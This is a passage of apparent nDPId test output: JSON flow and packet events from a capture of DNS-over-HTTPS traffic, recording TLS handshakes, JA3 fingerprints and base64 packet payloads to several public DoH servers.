EyYk+tfY7XoP1gsqXecmTp+tusAg1\/AwZK8oozX5LgL2HyoOuByw1lgzh0RLilH5JrY3yk0E\/jG5JRoV\/y41cG7xAhvYbSNXDFCXbKeSVI5tgPheZvJ9ZUyIfStt125MRChKnoA2n+mG9KzbpZpyVz66ndTD0j3XU1kDOqjF1\/SbGf1+fhwWGaMMcZUYzUS1y0NN++mGlj87\/Z\/u1peJJRpJLZAkwhE6\/qyvUgAeD6bdzGa3m+9PvZxqRFg4uO5BEHphZPz4E5S9y+qwaFy+ng2E0E\/+Mq99pz8NTeooSlgjy86miBLzf74wOBFSoHbVN0PHL56xSrx12FRC1SCfzqnzT4BREj4eRgr5sVcZJpcqB\/DJ16zqD31Cdz1F6VAt5mHD5hgyW+BhQO6jtpBgHqFisMVPWD18uXILfOEcLKzexTq0enEqkxPPztMgd3lKJoJoLn9D15r82RK7HhKsmZiDKUuCdmH3DjKAbtkj9uSMWDKDEZ7ALu1TTrcVpMz\/u916YJjVrsJ4zke1Y\/PKCwgQji1xX0Q1uKg+Qhmzj0YA6C\/ZB8hBOasuUjTVZER2lXZpSogcQcgdsx7P47du+ZkiOIevUp1ckurR953sVaD3ci+d3blInJn3V2H1nd41bCStQkPyhbrCiGVWDvB4NjqVSIh6ypL1X2Tez7o9uIFek3e\/KdLnjoJYgUoUCdBCeRBScD+0K+sqvZzi8z7OnTzhYK\/aCGv11HpK88nhB\/fu4rCw6Clf8iUvZmwOIdmA\/mXVezV7u9+Y+L4mJOPGGV+Ie7YQjoii0W0J9zldsek4JrCNAfpxxvmfZTghYCrVQJNlGcKyp+LE4s0nXJXsv8iOBmDMV\/qiHS\/RfVp0Al+GVjFpErgTgXH8uFG0eZxhSX5TnPtc5X3FjIRORKWkOyTX+MlnBU+yWrj3iWALBhonn7tNa85eK0vFJHHFGyQm3hMEk7psuYZdoK61bs1KKeUi4RTDX274TTDnDx\/vYrXCGEMbInwJeEUUq10Y0AUNC+ikXVAlZm5\/6b3SLH1mmyzy5AwgfbHNdBdm2h13eHYAHANjDp++p3nOFwMDARmCniHbpabBh0wmz+4GvD7gEaHTo1WwpHFuO0rRndT2cE+rB3NSEIZ\/OfAhdTV9eadRkxEucZ2zRFouLobhVj7VuatuyZROJYubLXxY0L2AD9VfNIXMUeRNHnXvmwyBiqm\/8ZuzuiYxPVzYGJuS41vYyyQm1ND0\/vWricRWNYCIXjgbSqk6PFYh1FVGYRV8SSt7kE3Z3NtrXGW3LuaKD8ymXSg9dYJ9GwRxcPV5is5NEijit\/K0HuZymRnz0biX0ibyZ3bQdAu+3E+KHkL1KMxQnoIP\/X4lavINi95Z\/1+WkK1enaEAwf7tuLJlq5tLt+JOe3OVPJYXu+hVDAzfIFEvugfqxQ4aetpIOYSy0uy\/8Blk6BuP7s0kZRcDAwBF06XPl0W4alPWKLcZUBV1\/sR9gwxnLLJ0WJlMdAUkQ1CCMVwzdsK8lkkZUPttQ7nY8WKaipYb2yNRvSYmxfuU2S\/nIBiL"} 
-00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739390933,"flow_last_seen":946739390967,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":3394,"flow_avg_l4_payload_len":1697,"midstream":1,"thread_ts_msec":946739390967,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":946739390970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739390970,"pkt":"REREREREZmZmZmZmCABFAAB4ddJAAH4G2DAKAAAB2akUF4T0AbuSPuSllAS3MVAYAfWu5wAAFAMDAAEBFwMDAEWr1XNIOucPlOXvVPAlxCVPjuVei0Kv510pke\/KbmmoYPXHQYgn\/dXPL9SYgvzqDxY7NHWdbkgaLyLveAQw2UhT5DxScM0="} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946739400294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739400294,"pkt":"REREREREZmZmZmZmCABFAAFMOfJAAH4GNZwKAAABkv84YqrGAbtdpqacr2JwdlAYAfaNXAAAFgMBAR8BAAEbAwPHJz7Bz9zA6vh2mAtXguxbTFdhb5D1tFb1Dou8iu1ITyDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZG9oLmFwcGxpZWRwcml2YWN5Lm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACADmPqzqEwwIPykBECgQ7iBmKhoGpqhv77PEzGKWzxqPw=="} 
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946739400340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAuAAABAADgGq1qS\/zhiCgAAAQG7qsavYnB2XaanwFAQBBOXkAAAFgMDAHoCAAB2AwMDsBehTQYQ\/iH2Yhpyf+mLl1C35r3Ho6TovknKnjr8riDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZRMCAAAuACsAAgMEADMAJAAdACBo4BH+AA5SyDExxRIaGpKShy1vmsbixTg2m2T2NedPDxQDAwABARcDAwAgvk7ezJo1JZP9LjmZFBvdhSYoK5Td7g7\/A2oIAgI6osUXAwMJ2yS0n6M3Ydri+rIgYVXd+jwuTvP8FF1HMS4hAE9YkVd0802YEbU3pHhUuQANn0vXApBPxbj3FV9uCCuIZCOL4zY7+k\/N9QNOxO6wgqwyjpqF\/MSuGzGbkODdKsjr3MXDrOEDT8UY4Cf7sbDSqOIkajzwlllabjLyw\/JVxOtUepEpKMKQWPduyvGLlnSE+4Pi9X1F5dljLFonfMSt9epl2VwSF1nq8Zl4KKstqyQuG\/zmvd2vjAUtpZ7bRJhqcQEAuZwHSvB\/MtIxXfAzVeG47SjsazBlsuRoBS3fTomilsUH4J13\/0ChaLizKxEdSZ2w2K00iVdJ7hQkti8Yk+XaV61AEfwts012l3Az0Ul6QGn+ovAsikUEM
TOdEJmAEExk\/NRuYh4YJeat0fT6qqxPxOtp8iJmxclZOIdEdtKfFRlb\/Q3pIWRMmx+BKdsNQm6TtOsUrqgzJEovgnDvaBUadejY9LBbNHqxMK2V6F7gbnGKVjBjB76l32rCkAGXZjYpu99n3pc8VsX6toeCgNv6uuTb2IhBkEMBsiXbrPavcq8F51o9cjY6ri1T23vFWkuEBAAWOdINJTApJO1joFFgFxyMMNnlCpJoVnqu0i\/rinlDFg7S9CtMSJ0Ubb2fcMiTZVA8sg8c2grczf38tyMaZ9tLwrWkyrDaM66WF+r\/Smzgjb3lUh8vJ3yJCEPyKRtiP8bLVA86MJJR6swDhhbPo5TZc3HPN3paBxU5U9DTyACxQnk6EYqYsA8ZokkmQV3rXvd3nlNnXQvP8iTrcL1LydrbGPEmcxzftt97lwfP6IxI3O3sNlij9LY+i3W9W6NVdJf0gVlPHB34DPsUDzGCBqeTZuUD+fgbA8m0vHZeGLaeh2n\/ATJxgu83kBANWSs0j4JxeZwkxA4LQE6k9KdadeiuFQWUUsCMoytEmeRS+e2CKC26bva8V4F4G5ILpiDrVUa9OPpnIugEC\/pCpbfo45ejO0OYsjmcSB9VHs67ODTG8tfG\/HSnEWghmAKv96DqsZyAaTmkT0JkH5FkXlCzBQ8v8o8b6rSE0lRW\/lesYflMu+sWf50UV63CFJyy6fgpaJPxCw8SCnSJ9Wfe5036kFXS9TxM7sPwyghnAoVeaf7Fck3c5pxthPEaz67tzSOMeekQJOQi7xMcEt3jcaR5XiiPfvpfvbXLOiTYOMcz4nBR25XpUeWEHByMxgi+V+13jYe4gb5oIp\/OYL+ldNmokkEz0NkrXv9PYcDVxLHdE8YvZjA+Y3MOkWFCk9BM\/Rn01CyqbL8CmN\/DvCsMgWqz9BmPnWHQOqMnYSTykXgSFe9FyeKoNSng2DkGXmS4Ish3yys0i\/QIlGlT9piLrC2UOh5tHQYhdkxZTzWOLoSNhJgdpKplLIWgmFyDHNvrhDmwq50tATdlnRMhe0ry66PsM3l0lek7HZ1iPpCZ7a660QlaPE9SZFbRD2hjaqHqZrlPWWwgi6eHfY0gu5vY3pzyuUgNc+IY+oeDLEyaB3ysUDN7Sr1IZYyAtSiOnN0WLtHIeg9uqvR4NEBF0XEfeRxZT0n6RrygJ1nWV+kailDfsz4vklZfPYltDFOyTnwOyyzBO2WpBi+QHoJdR5a+ci207f4TAHC5iWzq9Ov\/CBA21s0iwXcKHtUUuFkXfGsSTcHlMRdWRoqqdrwRmUkHc5FaU6RNse5tyVEdBKfOwfXkDw8I22zIDBmTO4YVBH4Dzw0SEVpSPVqE8m2STbZxIzmRtVGFxbw45tbGu6NUyHfb6XRJMV4vKdl8h+lVfwIggGdSBSYb\/J2WkIjXI5Z1\/s5OXr498b\/Ul1cfjj192V+QV7YEDHDJ0wunGAConliOcHcZIZrOpVaNMM7NeTBxiiUgynpVWjltr\/LQuk0Pld3mEIxmwXht0KmUnXyCvTBJgPYroLRuneYRQPZ1JOgkt\/kdsQBmYrZvkRHKWFwNxkLAhypRqmOoE6eO9TYZgchFtH7ouVK4C6vE0wlk\/wNdktEQVjtjEf81TNo\/lytMdDE\/EAGs9weyRqd\/Hmz5\/6yLIgAilI7sqB7dEuE0iiOXk4T95pQbOjvSnwI7M4B7Q3oDNdWJJRZNp2tZGQNCVfj0OFzEKSZbanefGx8qbWewy7Iup5wriwLbBG\/B7ZFkxdmUnEdpL4pTOBRMxGDxRjV5ioqpujq6Ef07dgH3IGRgJHxsp9J2Qlj8S7lCwwOsTDkI+PhLsXzzIudX\/ZiC+lH4Tm6LciXTHf3hDkr34EJfXHJ2WpSeeCsJZBkZx0OJpBR3y1cyrhzb66IxG0uSRnndSXXBNAmD+Gghsj7Kg4E50GUXibzQRhDNRs87q1TvRNjyYI9h
\/opUmKnHAkXz4SItfTxaX2LIVbjHXv1XndcnuHwhJgHhiVGswZvXlXVlX8K4fGgnhgpZ7MSQN2lSYmnj2j7A1n8u\/xbD+JqpDU+SOMNWtYlDQ0M+WzoE91BSSQYj6pIr9DxppqLCgUAfJpZxJ8YTmINwfhMZVMPhUF+vys97o5XgriLF7uzxf2I4907edC79eKV1Vf3Ui9qrIThroIUvlpq69fVaplHqZXdbs+zwj7e2bSPVWUVR0G4cA3aU9fbVCQvpl3a\/SuOWAYL5O1\/gu5GJXDImY\/gEO1xe+OVqS2aF0XojyeNtILIeW1nDYyaMtRMD0J7qIxHbffBANlspXb0qgGJLXRsdV8\/\/lQ9fV9vIoHgsaUsdWxpVNTmqaQBhX+l7X3gEUnrZ2jVkY6Oh5aU+eYdso\/pGSL+gHQ1M1e6uj4SYxfEhZHY1voW\/zrjGcvC2BmpxPhTrZRQE7Z8GgjqyG\/K9Af758C5W6bNB\/xr5yeKDI\/G5cyIFeblO2dJmHUb92Zs9qV6hqZGonI7Nft2QsKRvSQjz6cpX\/ZVUA+5e0AnpZpXEPBjJfZQ24FXs9QBvGk2XnWW8Dboig8I5f6Aa0W91KG5sO3Doyp3jU3SQ\/ah58ZIaBgplOwc2\/XF6kzcQLnHv217TTOCL7ScT90UL1M8uz6xGKTqy83KCKRxOqCSmaU4GimFhTvfwqF7ljKegUp6S9OeYOOt+VYDC0UeVysX6yYVwgIBxXA8D51WCmgGdUznHhIQtp1cWWN2T6pBItiud+sR32LmiE5tMUZYbwm2xu\/Nih47FXpRY2xq\/SEOEBCWv+pct34wnV4RwGw\/IvRU9BDEL1I7Sc1UFJRrazHP37UtPsKE1Z1llTnptgsNBNnDluQKifySFsqvXdr8Wwvn6V56upoM0fLxPG\/\/F6OVsniKNnqDtgpVsVi86SZ5O9M+5OvtEmUD8hQl4gxL2QqLYZIWV6vswIZSATUQuw0pUlpiEaj4PymXC95\/5pMEQnYMyOGFn2xcDAwCAmr0Gh4ZNVa+hT2Dwwrpwf9EMB3SMWmSnSLNfZ1YP9lq\/H3H\/YzkchSbogwVw+NXvSKa3Q5dILWczbhkBruescLznbqY0DC+TTlEnvK+mjob5wwR3lQsp8odDMfmh22P3SAFc1ZvCoRb2GkaVN69lxvgMa3mO7aDcfiHSTbC8C9cXAwMARePoOyVbKZG3xXgBtpg5jANBShpYQchD5Po7jBmjBEffrOCijDBbST3aotIn5HBfw8iB7gJCrbmWU17Z2peLW9KOid+9"} -00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400294,"flow_last_seen":946739400340,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739400340,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":946739400340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAApAAJAADgGtq+S\/zhiCgAAAQG7qsavYnvOXaanwFAYBBNMgAAA9gAAAAAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946739400581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":946739400581,"pkt":"REREREREZmZmZmZmCABFAAFHpuhAAH4GfboKAAABwUZVC9OUAbunNzlTos+VOVAYAfbYRwAAFgMBARoBAAEWAwO9Yq6mzn6Kf+YkY+w4Q\/vo+7yhlWhjohroCY4Mal823CCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACnAAAAFgAUAAARZG9oLmJvcnR6bWV5ZXIuZnIABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6wutcF723xZ1OaF0ooDfgy7xahyBeOD2x7PNk\/t6gG4="} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-04382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":946739400612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAuA435AADQGgOvBRlULCgAAAQG705Siz5U5pzc6clAYAfXigAAAFgMDAHoCAAB2AwPum08l8a\/xsIE7sf4ouj1cFjIcJvTzL6IcltC8x2MVWyCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XxMCAAAuACsAAgMEADMAJAAdACDFCe5GcFoAINJ8W\/U00yxwlYg7Wtx0yaBhsZxlJVHAahQDAwABARcDAwAgjb6\/bt9RU3n7f\/XK70kHoogWe0pWzujxYyDQFCzDS9sXAwMKFyLHVFWncnvuWpj00oLMIDtr5tAZiqfcqzwOOMNYqfKKQHH219coqZSx1dHk2hi5d1LB3GytI8vYkc59i5RQQDbXAHUuezlbBvO8F+B3yrBrypISyNX1A4sx1E9x9g092nWO74tZVT++3VZ86RoDvvF0ZUqxTSHr+1nR9kKZh0N5lUkvTu0aK5ORhVWNfmq0hwnrW5s27rBfHFIN8y0h27yxFq4SIl7wwuk6Mq7vkrvqIsM5xqyCc\/9Xu0OqSF3zUNnkItIrGQeIJp3LGwwIhQxxQAsnuWmwcXNFRqEzMD5jbEtpKYkHahCBuU\/B3PKrCTX8+YsVVjGS5Qrjne3Kr5FWp6nlPfIH59LkIEasv75h75FcjD+7wr54z1JIPpP7ZrLR5PywuD6f88xvloKZN+WwiXGAie649c7JKsyGwCn507cb9CeSrJLhgRoQlUSUEBlnxiSHhJ2mw9owqvmzHqRqTxGrXh9qTPYDQpk5QRLmSGX3D7g6VS6CrNB+GfCK6SPMgzdR+k8lAJJdHOY0ZZdv+Ya6nA3r8RDkXrspyuJsV4QMPLAoNzQvGen9CeK5JxcSLtBMp5q0B1DBO5EIcsoLQQ6lCwlPm8U6NZmJK6eA9zbgzP80r8LRBBpZx1beD6mw3j+TpFAy+igQ8+ETtD4YPbZPWCgC6xVG0u33AvPq8sRsHwGqnzJp1MW\/CDUHInzc9xT9j80aqrzF0XcmMIsrs4KNMQ8QDQCsJmct9U0iMbkLXGLFA32BoRsU95KY+6gDs57twsE3JaqfYSuTq\/Dlicgoiy07U8DZsIf1tKivKbhBZS1qr1PaAU2W3RuJy+8koP4fg1irOvcozqBrDOixlNBNoG8ob7RGwcT3Z0ArR3tWTeHxhQydU29KSYU8HwZniOUgn1K8cz071\/P8S72m5u89j2RZsoG54t+A\/1vLyZMsjOXjwepn9YLOohxBXEIx84KuxUh3bAga+k\/yE8GW5vng0KtP1aBiU4Tc6A+REN2DA3ij6lHoD2sFhJA2fLcssM6OpAK\/moM166igfSm3LqGC4gK+TDj4gtClJchy8bvN8tctQ8iFjFj\/6qv7lxplsZ49PvHPbnKju\/tev2fd5dDj7QcMjqNvhblPBUZ32SOOjxBH3RE7aBpBLMz7W1\/NpSWcgM15pyZsPx8isO02KbyH6gAHIs+ZEGj61i6mnrDsMNesZUMUM55VeDXhdpD8kmxGJpLZ3bsJ69dZmjx3Rf6Zgw2KbXhlm6KMoEBrRSd15+xgTimUz9H5N6PvNLfaRiG
X8r4RI6AIPrxRNjrz1JtdmeN1NzdaLUaHCvnql7jjxoX9Sn8xtUQxnkcUzYoweeIrvi9ulLP7ucnd54pGXhyPpURQBCM2nU9nbu+b6Pbj4vx7uFCRh\/lkqhRWVdTtE5uZmH8x4uxAXTdo\/R5oSgAkEsgUzYbuz4+G0Ch0T6jruu4T9ekEthrBCQJjN3fHGBcpM7AMfx+FKZas1DTjRC6L41JS2ixQWYjQbws0Hx+sBQGG6PAX0ilnkOFTCqdi4OZ+YhHBZ3aa4TDran\/FLmLs4pdGLb\/oqLyzwsvNQ7jdGUh2A89lsoDzqOObMQCUrWrG7EbmBEy\/sbHnGgiIy31PynXQexT3lSGWXsVy54UK1SdBZ18JpRAq1XaEcJZV9BqOYiMFEVnHR9zwIUFWwIjG0UpAOSNn7blveeCwW\/YovVsVKboGuW3yyReDZYyNgSvRfgvPpiG+pklW5Ihw+wYJ1sPXS0I2yAnATL00hg3Bnv3J6\/Z\/+4vJOHMRe5zCkPZYK8w\/AOnTp5VZVUALMm2aJruUFq4CXZyWMk1kbL3XBzpFB\/roJe8IiU+Kt9kQ449THNAxRUoavQeSeXnuQSkwDYmI0buLWeiaEzMUY5OavuLtDgD4c+avQlGrce7Ozez1RlLgPgV+i3DcrjoWos6tTeu8g4pr3NuCp14nKYaub7Vt2s0JPBPZqY\/MuyLA\/e3Fr\/OMlh\/EauRFDsRaqiHBJ2mP3NA8\/ZyaQQcWAIVjHSjsVGu2nQBYWjKsZ8mKcS9VpMr9ndCkWOs5Sz5zWAutH8paKKKAqBcvloCRHOWIfcJ9h9uc3Lq9DYb+le+8B4yxwh7qQJOXNZwdUQbb19fMRPNRiaEzON5GpXpNywN75iIVBnfCJp5hZfV7tIfK22ta\/Z6stqDCIyk+p27DCeEPYmTJDSSHKNbedRdn0\/iB9LUsBrCmi7IRRBlE2Tr8s2JDIPOoL9S4j6C6g1r3fpCuw4mXBrcGCfNjDw6rPYEplJqhIiTO+juQuxn5Prjqj21RvbfTbyzJIvTV7a0Zy5SJ1YWQ9z3NLs75HRnYaEIc3G103AKPkytzCjXINk0eKUkCZXrW9QupQw5YZCi9c+zr9e6Nsrg4KBkr13ePLbPEqhzK0TgphOe\/BgDw39ES3e0uIMvXuKrcPIZlkW8iZdSPWqT0Pls1rgFcXIxjJuZzAKdz9RIDjZGrpzpHXAzwarf0m0i2Gtw3bYKFHdkTT5n1uaYQthMuQHJHi+p8XDFtekQax3jKJD3CiZg+YeLzJ5Uo0iEidZKe5rH7ZzgkT8O0rVZwq5niGJgbiV3EUpPldHNKypyvkj3ycT9kY2IJU7ZpXJRnpDRxjhVDO4G\/kK6jqgKdwB9YrN8ddL2ErNeFlxtrqM8tHt2ZYdSMZYCnp2omvPy97RCe3Cp\/HGnLxpRs+DW569z8h8BSfI\/zMEZeQ4RsdRgF8hz+rQ8SRDGvtaqUblOPSNlurg9vSpcyYw7DcuCxkCASBOvLXbWh8As7fT8An8+JscVf\/lq\/mGQvDlSuFNj+tDMXoI0ZKapFzG\/KPdLhwKgFCipECC9Er6NeMVnAw07Z3oto50ydjbh57kzukh0zqDBLZjEhtFpoAiVBqZg7B50ytdFgK+6hZgsHjVoNuFRf32MJngr13fBBtHKo\/VHaVg4drs9W9DfAL1w5rtOMVsX6aUt1YAeiwdGBNEPyNmvNCcEQOj+xzMfVoOLm7SUXFyIm1n+reDHyXo8yNG7LkDYjmq\/JLkrpjl4bFeLBsdG760CBaEUCZJd3nvhfPPBsfCBF5PswuYpAEifKeZ17NlOaSrxj79WssKYt4uUKm2gm9JHcvNneM5n7DQEooPTVEVYNOgvXrRVlbfz+Cy2kBP2gCp+jUrcKx4YKGEhDuMaL8PfHGRT2vA7nqzUU9C3cJ3emOjaD7KMjipJvPBaA7U+L8ujhu2gJWLx4yY7mn3RV6K2Hs
rFjTJduvDGB+DqQg96t2CJjvMbpqIitN9hBxZbznMh3XU1HogwVfIbOe8Ug8cikY7ag9rW6E1CfeBwa9CM8u9CTXlTgumW220WzI\/+S8CMvOup0C9PugMt2Jc4cXDvNs+dyRWH3X7QIImonFrQ6RaFIHlbDa5gqN+0VC87hnjQE8OUpxOAg1ReSXhcDAwEZLWp\/o3fXWPvp18ZXCuvlFC4i5H\/0jL\/Tq956IZziJu\/XhSjlSr056BPu7zKCegDZWzYsK6oLPWAfcvtcSfAPACHpLE+JYCNMevr7LjdkYBxYeJsjktZDgoEi7lSxc1XaPOcOHuKcNBIZPhHzY\/jpu14RecKRjxP8M4PlZTTXUvzf286xa1A7FPGcV7e6"} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400581,"flow_last_seen":946739400612,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3191,"flow_avg_l4_payload_len":1595,"midstream":1,"thread_ts_msec":946739400612,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
